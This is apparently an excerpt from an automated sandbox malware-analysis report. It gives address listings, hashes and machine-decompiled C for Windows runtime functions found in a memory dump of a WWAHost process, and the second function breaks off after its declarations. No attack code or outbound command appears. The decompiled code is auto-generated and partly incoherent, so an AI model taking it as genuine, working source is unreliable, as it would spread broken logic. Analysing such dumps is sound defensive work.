                                              0x039741ee
                                              0x039741ee
                                              0x039741f4
                                              0x03974575
                                              0x039be1b1
                                              0x039be1b1
                                              0x00000000
                                              0x0397457b
                                              0x0397457b
                                              0x03974582
                                              0x039be1ab
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03974588
                                              0x03974588
                                              0x0397458c
                                              0x039be1c4
                                              0x039be1c4
                                              0x00000000
                                              0x03974592
                                              0x03974592
                                              0x03974599
                                              0x039be1be
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0397459f
                                              0x0397459f
                                              0x039745a3
                                              0x039be1d7
                                              0x039be1e4
                                              0x00000000
                                              0x039745a9
                                              0x039745a9
                                              0x039745b0
                                              0x039be1d1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039745b6
                                              0x039745b6
                                              0x039745b6
                                              0x00000000
                                              0x039745b6
                                              0x039745b0
                                              0x039745a3
                                              0x03974599
                                              0x0397458c
                                              0x03974582
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039741f4
                                              0x0397423e
                                              0x03974241
                                              0x039745c0
                                              0x039745c4
                                              0x00000000
                                              0x039745ca
                                              0x039745ca
                                              0x00000000
                                              0x039be207
                                              0x039be20f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039745d1
                                              0x00000000
                                              0x00000000
                                              0x039745ca
                                              0x00000000
                                              0x03974247
                                              0x03974247
                                              0x03974247
                                              0x03974249
                                              0x03974249
                                              0x03974249
                                              0x03974251
                                              0x03974251
                                              0x03974257
                                              0x0397425f
                                              0x0397426e
                                              0x03974270
                                              0x0397427a
                                              0x039be219
                                              0x039be219
                                              0x03974280
                                              0x03974282
                                              0x03974456
                                              0x039745ea
                                              0x00000000
                                              0x039745f0
                                              0x039be223
                                              0x00000000
                                              0x039be223
                                              0x0397445c
                                              0x0397445c
                                              0x00000000
                                              0x0397445c
                                              0x00000000
                                              0x03974288
                                              0x0397428c
                                              0x039be298
                                              0x03974292
                                              0x03974292
                                              0x0397429e
                                              0x039742a3
                                              0x039742a7
                                              0x039742ac
                                              0x039be22d
                                              0x039742b2
                                              0x039742b2
                                              0x039742b9
                                              0x039742bc
                                              0x039742c2
                                              0x039742ca
                                              0x039742cd
                                              0x039742cd
                                              0x039742d4
                                              0x0397433f
                                              0x0397433f
                                              0x039742d6
                                              0x039742d6
                                              0x039742d9
                                              0x039742dd
                                              0x039742eb
                                              0x039be23a
                                              0x039742f1
                                              0x03974305
                                              0x0397430d
                                              0x03974315
                                              0x03974318
                                              0x0397431f
                                              0x03974322
                                              0x0397432e
                                              0x0397433b
                                              0x0397433b
                                              0x00000000
                                              0x0397432e
                                              0x039742eb
                                              0x0397434c
                                              0x0397434e
                                              0x03974352
                                              0x03974359
                                              0x0397435e
                                              0x03974361
                                              0x0397436e
                                              0x0397438a
                                              0x0397438e
                                              0x03974396
                                              0x0397439e
                                              0x039743a1
                                              0x039743ad
                                              0x039743bb
                                              0x039743bb
                                              0x039743ad
                                              0x0397436e
                                              0x039743bf
                                              0x039743c5
                                              0x03974463
                                              0x03974463
                                              0x039743ce
                                              0x039743d5
                                              0x039743d9
                                              0x039743df
                                              0x03974475
                                              0x03974479
                                              0x03974491
                                              0x03974491
                                              0x03974479
                                              0x039743e5
                                              0x039743eb
                                              0x039743f4
                                              0x039743f6
                                              0x039743f9
                                              0x039743fc
                                              0x039743ff
                                              0x039744e8
                                              0x039744ed
                                              0x039744f3
                                              0x039be247
                                              0x00000000
                                              0x039744f9
                                              0x03974504
                                              0x03974508
                                              0x0397450f
                                              0x039be269
                                              0x00000000
                                              0x03974515
                                              0x03974519
                                              0x03974531
                                              0x03974534
                                              0x03974537
                                              0x0397453e
                                              0x03974541
                                              0x0397454a
                                              0x039be255
                                              0x039be255
                                              0x039be25b
                                              0x039be25e
                                              0x039be261
                                              0x039be261
                                              0x03974555
                                              0x03974559
                                              0x0397455d
                                              0x039be26d
                                              0x039be270
                                              0x039be274
                                              0x039be27a
                                              0x039be27d
                                              0x039be28e
                                              0x039be28e
                                              0x03974563
                                              0x03974563
                                              0x03974569
                                              0x03974569
                                              0x00000000
                                              0x0397455d
                                              0x0397450f
                                              0x00000000
                                              0x039744f3
                                              0x039743ff
                                              0x03974405
                                              0x03974405
                                              0x03974405
                                              0x039742ac
                                              0x0397428c
                                              0x03974282
                                              0x03974407
                                              0x0397440d
                                              0x039be2af
                                              0x039be2af
                                              0x03974413
                                              0x03974413
                                              0x00000000
                                              0x039741d4
                                              0x00000000
                                              0x039741c3
                                              0x039741bd
                                              0x03974415
                                              0x03974415
                                              0x03974416
                                              0x03974417
                                              0x03974429
                                              0x0397416e
                                              0x0397416e
                                              0x03974175
                                              0x03974498
                                              0x0397449f
                                              0x039be12d
                                              0x00000000
                                              0x039be133
                                              0x00000000
                                              0x039be133
                                              0x039744a5
                                              0x039744a5
                                              0x039744aa
                                              0x00000000
                                              0x039744bb
                                              0x039744ca
                                              0x039744d6
                                              0x039744d7
                                              0x039744d8
                                              0x039744e3
                                              0x039744e3
                                              0x039744aa
                                              0x0397417b
                                              0x0397417b
                                              0x0397417b
                                              0x00000000
                                              0x0397417b
                                              0x03974175
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52beffd74f07e8fe9d1c502e8ca87d597f6cb0bb23f5927866f7b7e88b21d13a
                                              • Instruction ID: c19a13be8c2d17dc8bf12ac88e20ee4636379b30b8f7467392ab82e1695d3c30
                                              • Opcode Fuzzy Hash: 52beffd74f07e8fe9d1c502e8ca87d597f6cb0bb23f5927866f7b7e88b21d13a
                                              • Instruction Fuzzy Hash: 69F18C74A083118BC724CF1AC580A7AB7F9FF88754F59496EF886CB291E734D891CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039820A0 Relevance: .4, Instructions: 420COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E039820A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x3a48714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E03982EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E03982EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E039558EC(_t240);
									_t221 =  *0x3a45cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x3a45cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03994A2C(0x3a46e40, 0x3994b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E03977D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x3935c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0398F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0398F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E039D7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L03972400(_t267 + 0x20);
															}
															L03972400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E03982397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E03972280(_t134, 0x3a48608);
									__eflags =  *0x3a46e48 - _t253; // 0xb5cef0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0396FFB0(_t198, _t241, 0x3a48608);
										__eflags = _t253;
										if(_t253 != 0) {
											L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x3a46e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x3a48608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E03986B90(_t210,  &_v64);
										_t262 =  *0x3a48608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0398E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E039997C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0399006A(0x3a48608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x3a48608);
												E0399B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x3a46904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x3a46e48; // 0xb5cef0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0396FFB0(_t198, _t240, 0x3a48608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E039900C2(0x3a48608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                              0x039820a0
                                              0x039820a8
                                              0x039820ad
                                              0x039820b3
                                              0x039820b8
                                              0x039820c2
                                              0x039820c7
                                              0x039820cb
                                              0x039820d2
                                              0x03982263
                                              0x03982266
                                              0x039c5836
                                              0x039c5836
                                              0x00000000
                                              0x0398226c
                                              0x0398226c
                                              0x03982270
                                              0x03982274
                                              0x039820e2
                                              0x039820e2
                                              0x039820e6
                                              0x039820ee
                                              0x039c57dc
                                              0x039c57de
                                              0x039c57ec
                                              0x039c57ec
                                              0x039c57f1
                                              0x039c57f3
                                              0x039c57f8
                                              0x00000000
                                              0x039c57f8
                                              0x039c57e0
                                              0x039c57e4
                                              0x039c57ea
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039c57ea
                                              0x039820f4
                                              0x039820f4
                                              0x039820f8
                                              0x039820f8
                                              0x039820fc
                                              0x03982100
                                              0x03982106
                                              0x03982201
                                              0x03982206
                                              0x0398220b
                                              0x0398220e
                                              0x039822a9
                                              0x039822ac
                                              0x00000000
                                              0x00000000
                                              0x039822b2
                                              0x039822b5
                                              0x039c5801
                                              0x039c5806
                                              0x00000000
                                              0x00000000
                                              0x039c5810
                                              0x039c5815
                                              0x039c5818
                                              0x00000000
                                              0x00000000
                                              0x039c581e
                                              0x039822bb
                                              0x039822bb
                                              0x03982218
                                              0x03982218
                                              0x0398221c
                                              0x03982220
                                              0x03982222
                                              0x039822c2
                                              0x039822c4
                                              0x039822dc
                                              0x039822dc
                                              0x039822e1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039822e7
                                              0x039822c8
                                              0x039822cd
                                              0x039822d3
                                              0x039822d6
                                              0x039c5823
                                              0x039c5825
                                              0x039c5827
                                              0x00000000
                                              0x00000000
                                              0x039c582d
                                              0x00000000
                                              0x039c582d
                                              0x00000000
                                              0x03982228
                                              0x03982228
                                              0x00000000
                                              0x03982228
                                              0x03982222
                                              0x03982214
                                              0x03982214
                                              0x00000000
                                              0x03982114
                                              0x03982114
                                              0x03982114
                                              0x0398211a
                                              0x0398211c
                                              0x03982348
                                              0x0398234d
                                              0x039c5840
                                              0x039c5845
                                              0x039c5848
                                              0x039c584e
                                              0x039c584e
                                              0x039c5848
                                              0x03982353
                                              0x03982355
                                              0x03982388
                                              0x03982388
                                              0x03982368
                                              0x0398236a
                                              0x0398236c
                                              0x0398238f
                                              0x00000000
                                              0x0398236e
                                              0x0398236e
                                              0x0398218e
                                              0x0398218e
                                              0x03982191
                                              0x03982195
                                              0x039c5a03
                                              0x039c5a06
                                              0x039c5a0c
                                              0x039c5a0f
                                              0x039c5a11
                                              0x039c5a13
                                              0x039c5a13
                                              0x039c5a19
                                              0x039c5a1f
                                              0x00000000
                                              0x0398219b
                                              0x0398219b
                                              0x039821a0
                                              0x03982282
                                              0x03982284
                                              0x03982284
                                              0x03982284
                                              0x03982284
                                              0x039821a6
                                              0x039821a9
                                              0x039821ac
                                              0x039821ae
                                              0x039821b3
                                              0x0398228b
                                              0x03982290
                                              0x03982379
                                              0x03982296
                                              0x03982298
                                              0x03982298
                                              0x03982290
                                              0x039821b9
                                              0x039821be
                                              0x039822a2
                                              0x039822a2
                                              0x039821c4
                                              0x039821c8
                                              0x039821cc
                                              0x039821d0
                                              0x039821d4
                                              0x039821de
                                              0x039821e3
                                              0x039c5a29
                                              0x039c5a2c
                                              0x00000000
                                              0x00000000
                                              0x039c5a3b
                                              0x00000000
                                              0x039821e9
                                              0x039821e9
                                              0x039821e9
                                              0x039821ee
                                              0x039821f1
                                              0x039c5a45
                                              0x039c5a4b
                                              0x039c5a52
                                              0x039c5a58
                                              0x039c5a5d
                                              0x039c5a5f
                                              0x039c5a71
                                              0x039c5a61
                                              0x039c5a6a
                                              0x039c5a6a
                                              0x039c5a76
                                              0x039c5a79
                                              0x039c5a7f
                                              0x039c5a83
                                              0x039c5a85
                                              0x039c5a87
                                              0x039c5a87
                                              0x039c5a8c
                                              0x039c5a91
                                              0x039c5a97
                                              0x039c5a9f
                                              0x039c5aa0
                                              0x039c5aa1
                                              0x039c5aa6
                                              0x039c5aab
                                              0x039c5ab1
                                              0x039c5ab3
                                              0x039c5ab9
                                              0x039c5aca
                                              0x039c5ad4
                                              0x039c5ad4
                                              0x039c5ade
                                              0x039c5ade
                                              0x039c5aab
                                              0x039c5a79
                                              0x039c5a52
                                              0x039821f7
                                              0x039821f9
                                              0x039821fe
                                              0x039821fe
                                              0x039821e3
                                              0x03982195
                                              0x0398236c
                                              0x03982122
                                              0x03982122
                                              0x03982124
                                              0x03982231
                                              0x03982236
                                              0x03982236
                                              0x03982238
                                              0x03982238
                                              0x03982240
                                              0x03982242
                                              0x03982244
                                              0x039c59fc
                                              0x0398218c
                                              0x0398218c
                                              0x00000000
                                              0x0398218c
                                              0x0398224a
                                              0x0398224f
                                              0x03982256
                                              0x03982304
                                              0x03982309
                                              0x0398230f
                                              0x0398231e
                                              0x0398231e
                                              0x0398231e
                                              0x03982320
                                              0x03982325
                                              0x0398232a
                                              0x0398232c
                                              0x0398233e
                                              0x0398233e
                                              0x00000000
                                              0x0398232c
                                              0x03982311
                                              0x03982317
                                              0x0398231a
                                              0x0398231c
                                              0x03982380
                                              0x03982380
                                              0x03982380
                                              0x03982384
                                              0x00000000
                                              0x00000000
                                              0x03982386
                                              0x00000000
                                              0x0398231c
                                              0x0398225c
                                              0x0398225c
                                              0x00000000
                                              0x0398225c
                                              0x0398212a
                                              0x03982134
                                              0x03982138
                                              0x0398213d
                                              0x039c5858
                                              0x039c5863
                                              0x039c5863
                                              0x039c5867
                                              0x039c586a
                                              0x00000000
                                              0x00000000
                                              0x039c586c
                                              0x039c586c
                                              0x039c5871
                                              0x039c5875
                                              0x039c5877
                                              0x039c5997
                                              0x039c599c
                                              0x039c59a1
                                              0x039c59a7
                                              0x039c59a7
                                              0x00000000
                                              0x039c59a7
                                              0x039c587d
                                              0x00000000
                                              0x039c588b
                                              0x039c588b
                                              0x039c5890
                                              0x039c5892
                                              0x039c5894
                                              0x039c5899
                                              0x039c589b
                                              0x039c58a0
                                              0x039c58a0
                                              0x039c58aa
                                              0x039c58b2
                                              0x039c58b6
                                              0x039c58be
                                              0x039c58c6
                                              0x039c58c9
                                              0x039c590d
                                              0x039c5917
                                              0x039c591a
                                              0x039c591c
                                              0x039c5920
                                              0x039c5928
                                              0x039c592a
                                              0x039c592c
                                              0x039c592e
                                              0x039c592e
                                              0x039c58cb
                                              0x039c58cd
                                              0x039c58d8
                                              0x039c58e0
                                              0x039c58f4
                                              0x039c58fe
                                              0x039c58fe
                                              0x039c593a
                                              0x039c593e
                                              0x039c5940
                                              0x039c5942
                                              0x00000000
                                              0x039c5944
                                              0x039c5944
                                              0x039c5949
                                              0x039c594e
                                              0x039c594e
                                              0x039c5953
                                              0x039c595b
                                              0x039c5976
                                              0x039c5976
                                              0x039c597a
                                              0x039c597f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039c5981
                                              0x039c5981
                                              0x039c5981
                                              0x039c5983
                                              0x039c5988
                                              0x039c598d
                                              0x039c5991
                                              0x039c5991
                                              0x00000000
                                              0x039c595d
                                              0x039c595d
                                              0x039c5963
                                              0x039c5965
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039c5967
                                              0x039c5967
                                              0x039c596b
                                              0x039c596d
                                              0x00000000
                                              0x00000000
                                              0x039c596f
                                              0x039c5971
                                              0x039c5971
                                              0x039c5974
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039c5974
                                              0x00000000
                                              0x039c5967
                                              0x039c595b
                                              0x039c5942
                                              0x039c5863
                                              0x03982143
                                              0x03982143
                                              0x03982149
                                              0x0398214f
                                              0x039822f1
                                              0x039822f6
                                              0x00000000
                                              0x03982173
                                              0x03982173
                                              0x0398217d
                                              0x03982181
                                              0x03982186
                                              0x039c59ae
                                              0x039c59b2
                                              0x039c59b5
                                              0x039c59b7
                                              0x039c59ba
                                              0x039c59cd
                                              0x039c59d1
                                              0x039c59d5
                                              0x039c59d9
                                              0x039c59db
                                              0x00000000
                                              0x00000000
                                              0x039c59dd
                                              0x039c59dd
                                              0x039c59e1
                                              0x039c59e4
                                              0x039c59e7
                                              0x039c59ee
                                              0x039c59ee
                                              0x039c59f3
                                              0x039c59f3
                                              0x00000000
                                              0x03982186
                                              0x0398214f
                                              0x03982106
                                              0x03982266
                                              0x039820d8
                                              0x039820da
                                              0x039820e0
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1ca3b8ea9ef3073da5628e146a5171b2fb29262460cc97d40679295f02e2042
                                              • Instruction ID: ee649aeb59691c05b7db26bb52f545e8be30af2d61e6712d8eee8fa6dbedb1d5
                                              • Opcode Fuzzy Hash: f1ca3b8ea9ef3073da5628e146a5171b2fb29262460cc97d40679295f02e2042
                                              • Instruction Fuzzy Hash: 8FF125356083459FD725EF29C44072BB7E9AFC63A4F198D5DE8D98B280D735E841CB82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0396D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 87%
                                              			E0396D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
